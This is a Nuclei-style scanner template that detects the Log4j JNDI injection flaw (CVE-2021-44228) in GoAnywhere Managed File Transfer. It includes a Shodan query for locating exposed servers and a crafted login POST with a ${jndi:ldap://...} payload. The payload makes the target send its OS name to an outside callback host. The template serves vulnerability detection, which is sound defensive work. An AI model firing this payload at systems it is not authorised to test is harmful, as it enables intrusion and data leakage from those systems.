id: goanywhere-mft-log4j-rce info: name: GoAnywhere Managed File Transfer - Remote Code Execution (Apache Log4j) author: pussycat0x severity: critical description: GoAnywhere Managed File Transfer is vulnerable to a remote command execution (RCE) issue via the included Apache Log4j. reference: - https://www.goanywhere.com/cve-2021-44228-and-cve-2021-45046-goanywhere-mitigation-steps - https://logging.apache.org/log4j/2.x/security.html - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-917 metadata: shodan-query: http.html:"GoAnywhere Managed File Transfer" verified: "true" tags: cve,cve2021,jndi,log4j,rce,oast,goanywhere,kev requests: - raw: - | GET /goanywhere/auth/Login.xhtml HTTP/1.1 Host: {{Hostname}} - | POST /goanywhere/auth/Login.xhtml HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Origin: {{RootURL}} Referer: {{RootURL}}/goanywhere/auth/Login.xhtml formPanel%3AloginGrid%3Aname=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}} cookie-reuse: true matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: regex part: interactsh_request regex: - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable extractors: - type: regex name: view part: body group: 1 regex: - 'javax\.faces\.ViewState:1" value="(.*)" autocomplete' internal: true - type: kval kval: - interactsh_ip # Print remote interaction IP in output - type: regex part: interactsh_request group: 1 regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output # Enhanced by cs 2022/10/10